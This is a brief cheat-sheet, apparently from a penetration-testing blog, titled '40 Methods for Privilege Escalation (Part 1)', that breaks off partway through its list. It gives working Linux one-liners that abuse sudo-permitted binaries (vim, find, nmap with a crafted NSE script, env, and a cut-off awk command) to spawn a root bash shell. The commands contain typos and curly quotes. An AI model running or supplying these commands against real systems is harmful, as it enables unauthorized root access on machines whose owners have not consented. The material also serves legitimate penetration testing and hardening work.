40 Methods for Privilege Escalation(Part 1)
Abusing Sudo Binaries Domain: No Local Admin: Yes OS: Linux Type: Abusing Privileged Files Methods: sudo vim -c ‘:!/bin/bash’ sudo find / etc/passwd -exec /bin/bash \; echo “os.execute(‘/bin/bash/’)” > /tmp/shell.nse && sudo nmap –script=/tmp/shell.nse sudo env /bin/bash sudo awk ‘BEGIN